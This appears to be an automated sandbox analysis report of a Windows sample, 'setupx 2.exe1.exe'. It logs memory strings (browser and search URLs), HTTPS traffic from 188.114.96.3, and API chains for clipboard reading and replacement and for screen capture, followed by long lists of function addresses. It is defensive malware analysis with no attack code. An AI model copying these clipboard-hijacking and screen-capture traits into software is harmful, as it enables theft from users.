Source: setupx 2.exe1.exe, 00000003.00000003.1063219252.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: setupx 2.exe1.exe, 00000003.00000003.1063219252.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: setupx 2.exe1.exe, 00000003.00000003.1014672869.00000000032AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: setupx 2.exe1.exe, 00000003.00000003.1014672869.00000000032AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
Source: setupx 2.exe1.exe, 00000003.00000003.1014672869.00000000032AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: setupx 2.exe1.exe, 00000003.00000003.1014672869.00000000032AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: setupx 2.exe1.exe, 00000003.00000003.1063219252.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
Source: setupx 2.exe1.exe, 00000003.00000003.1062884184.00000000035B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: setupx 2.exe1.exe, 00000003.00000003.1062884184.00000000035B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: setupx 2.exe1.exe, 00000003.00000003.1063219252.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
Source: setupx 2.exe1.exe, 00000003.00000003.1014672869.00000000032AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: setupx 2.exe1.exe, 00000003.00000003.1014672869.00000000032AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: setupx 2.exe1.exe, 00000003.00000003.1063219252.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: setupx 2.exe1.exe, 00000003.00000003.1062884184.00000000035B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
Source: setupx 2.exe1.exe, 00000003.00000003.1062884184.00000000035B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
Source: setupx 2.exe1.exe, 00000003.00000003.1062884184.00000000035B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
Source: setupx 2.exe1.exe, 00000003.00000003.1062884184.00000000035B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: setupx 2.exe1.exe, 00000003.00000003.1062884184.00000000035B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49689
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49685
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49683
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49693
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49681
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49691
Source: unknown	Network traffic detected: HTTP traffic on port 49693 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49690
Source: unknown	Network traffic detected: HTTP traffic on port 49691 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49685 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49683 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49689 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49690 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49681 -> 443

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49681 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49683 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49685 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49689 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49690 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49691 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49693 version: TLS 1.2

Source: C:\Users\user\Desktop\setupx 2.exe1.exe

Code function: 3_2_004416E0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,

3_2_004416E0

Source: C:\Users\user\Desktop\setupx 2.exe1.exe

Code function: 3_2_030C1000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber,

3_2_030C1000

Source: C:\Users\user\Desktop\setupx 2.exe1.exe

Code function: 3_2_004416E0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,

3_2_004416E0

Source: C:\Users\user\Desktop\setupx 2.exe1.exe

Code function: 3_2_004418D0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,

3_2_004418D0

Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00166460	0_2_00166460
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00164CB0	0_2_00164CB0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0012553B	0_2_0012553B
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00141F50	0_2_00141F50
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0013D810	0_2_0013D810
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0015A810	0_2_0015A810
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00176010	0_2_00176010
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00121000	0_2_00121000
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00182800	0_2_00182800
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0012E030	0_2_0012E030
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0018A030	0_2_0018A030
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0014E020	0_2_0014E020
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00125856	0_2_00125856
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0017C050	0_2_0017C050
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00133840	0_2_00133840
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0015C870	0_2_0015C870
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0015D070	0_2_0015D070
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0017D070	0_2_0017D070
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0013F860	0_2_0013F860
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00166090	0_2_00166090
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_001498A0	0_2_001498A0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_001678A0	0_2_001678A0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_001428C0	0_2_001428C0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0013A0F0	0_2_0013A0F0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_001790F0	0_2_001790F0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0017E0F0	0_2_0017E0F0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0018B0F0	0_2_0018B0F0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_001350E0	0_2_001350E0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_001400E0	0_2_001400E0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00150110	0_2_00150110
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00174110	0_2_00174110
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0018D90A	0_2_0018D90A
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0013E900	0_2_0013E900
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0012C906	0_2_0012C906
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00158900	0_2_00158900
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00158130	0_2_00158130
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00176920	0_2_00176920
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00139150	0_2_00139150
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00136940	0_2_00136940
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00157170	0_2_00157170
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0012B960	0_2_0012B960
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00128990	0_2_00128990
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0013F190	0_2_0013F190
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0017D980	0_2_0017D980
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_001301A0	0_2_001301A0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_001389A0	0_2_001389A0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_001241D0	0_2_001241D0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_001841D0	0_2_001841D0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0015E9C0	0_2_0015E9C0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00182210	0_2_00182210
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00143200	0_2_00143200
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00171A00	0_2_00171A00
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0014CA30	0_2_0014CA30
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0014DA30	0_2_0014DA30
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00198230	0_2_00198230
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00183A20	0_2_00183A20
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0012D250	0_2_0012D250
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00153A50	0_2_00153A50
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00160240	0_2_00160240
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0017BA40	0_2_0017BA40
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00168A70	0_2_00168A70
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00143A90	0_2_00143A90
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00145290	0_2_00145290
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_001382B0	0_2_001382B0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_001812B0	0_2_001812B0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00187AB0	0_2_00187AB0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00137AA0	0_2_00137AA0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00158AA0	0_2_00158AA0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_001922CA	0_2_001922CA
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00129AF6	0_2_00129AF6
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_001272E0	0_2_001272E0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00128310	0_2_00128310
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0013B310	0_2_0013B310
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0012A300	0_2_0012A300
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00127B00	0_2_00127B00
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0012CB0F	0_2_0012CB0F
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0014D330	0_2_0014D330
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00183330	0_2_00183330
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00147320	0_2_00147320
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00161320	0_2_00161320
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00137B50	0_2_00137B50
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0016A350	0_2_0016A350
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00170350	0_2_00170350
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0017C350	0_2_0017C350
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0016EB40	0_2_0016EB40
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00149360	0_2_00149360
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00130B90	0_2_00130B90
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0013DB80	0_2_0013DB80
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00177BB0	0_2_00177BB0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0017D3B0	0_2_0017D3B0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00131BA0	0_2_00131BA0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0013E3A0	0_2_0013E3A0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_001553A0	0_2_001553A0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_001693D0	0_2_001693D0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0014A3F0	0_2_0014A3F0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0014ABF0	0_2_0014ABF0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0015ABF0	0_2_0015ABF0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_001893E0	0_2_001893E0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0013D410	0_2_0013D410
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00134C10	0_2_00134C10
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00156410	0_2_00156410
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00142C00	0_2_00142C00
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00181C00	0_2_00181C00
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00134430	0_2_00134430
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00130430	0_2_00130430
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00173430	0_2_00173430
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00188420	0_2_00188420
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00132450	0_2_00132450
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00145450	0_2_00145450
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0013EC70	0_2_0013EC70
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00153C70	0_2_00153C70
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0014E490	0_2_0014E490
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_001784C0	0_2_001784C0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0018A4C0	0_2_0018A4C0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00133510	0_2_00133510
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00149D00	0_2_00149D00
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0017FD00	0_2_0017FD00
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00129D30	0_2_00129D30
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00136530	0_2_00136530
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00143530	0_2_00143530
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0017F530	0_2_0017F530
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0015FD20	0_2_0015FD20
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00179576	0_2_00179576
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0015B560	0_2_0015B560
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00183D60	0_2_00183D60
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_001A5592	0_2_001A5592
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00142D80	0_2_00142D80
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0015DD80	0_2_0015DD80
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0015C5A0	0_2_0015C5A0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00128DD0	0_2_00128DD0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00157DD0	0_2_00157DD0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0015F5D0	0_2_0015F5D0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_001895D0	0_2_001895D0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0015DDD9	0_2_0015DDD9
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_001455C0	0_2_001455C0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0014B5F0	0_2_0014B5F0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00125DF6	0_2_00125DF6
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00167DF0	0_2_00167DF0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00130DE0	0_2_00130DE0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0012C610	0_2_0012C610
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00140E10	0_2_00140E10
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00187E10	0_2_00187E10
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00177630	0_2_00177630
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00181630	0_2_00181630
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00130620	0_2_00130620
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0014FE20	0_2_0014FE20
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00169650	0_2_00169650
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00184640	0_2_00184640
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0012DE60	0_2_0012DE60
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00161660	0_2_00161660
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0017A660	0_2_0017A660
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0012E690	0_2_0012E690
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00175690	0_2_00175690
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00162E80	0_2_00162E80
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0017AE80	0_2_0017AE80
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00145EB0	0_2_00145EB0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00163EA0	0_2_00163EA0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0014C6D0	0_2_0014C6D0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_001376C0	0_2_001376C0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0015AEC0	0_2_0015AEC0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0012B6F0	0_2_0012B6F0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_001466F0	0_2_001466F0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0015D6E0	0_2_0015D6E0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_001586E0	0_2_001586E0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0016AEE0	0_2_0016AEE0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_001A3718	0_2_001A3718
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0012BF10	0_2_0012BF10
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00142F10	0_2_00142F10
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0017EF10	0_2_0017EF10
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00129718	0_2_00129718
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0012A700	0_2_0012A700
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00175700	0_2_00175700
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00133F20	0_2_00133F20
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00139740	0_2_00139740
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00166F90	0_2_00166F90
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0017FF90	0_2_0017FF90
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00146FC0	0_2_00146FC0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_00172FC0	0_2_00172FC0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_0012D7F0	0_2_0012D7F0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 0_2_001707F0	0_2_001707F0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_0013D810	2_2_0013D810
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_0015A810	2_2_0015A810
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00176010	2_2_00176010
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00121000	2_2_00121000
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00182800	2_2_00182800
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_0012E030	2_2_0012E030
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_0014E020	2_2_0014E020
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00133840	2_2_00133840
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_0015C870	2_2_0015C870
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_0015D070	2_2_0015D070
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_0013F860	2_2_0013F860
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_0012C890	2_2_0012C890
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00166090	2_2_00166090
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_001798B0	2_2_001798B0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_001498A0	2_2_001498A0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_001678A0	2_2_001678A0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_001428C0	2_2_001428C0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_0013A0F0	2_2_0013A0F0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_001790F0	2_2_001790F0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_0018B0F0	2_2_0018B0F0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_001350E0	2_2_001350E0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_001400E0	2_2_001400E0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00150110	2_2_00150110
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00174110	2_2_00174110
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_0018D90A	2_2_0018D90A
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_0013E900	2_2_0013E900
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00158900	2_2_00158900
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00158130	2_2_00158130
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00176920	2_2_00176920
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00139150	2_2_00139150
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00136940	2_2_00136940
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00157170	2_2_00157170
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_0012B960	2_2_0012B960
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00128990	2_2_00128990
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_0013F190	2_2_0013F190
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_001301A0	2_2_001301A0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_001389A0	2_2_001389A0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_001241D0	2_2_001241D0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_001841D0	2_2_001841D0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_0015E9C0	2_2_0015E9C0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_0012D1E0	2_2_0012D1E0
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00182210	2_2_00182210
Source: C:\Users\user\Desktop\setupx 2.exe1.exe	Code function: 2_2_00143200	2_2_00143200
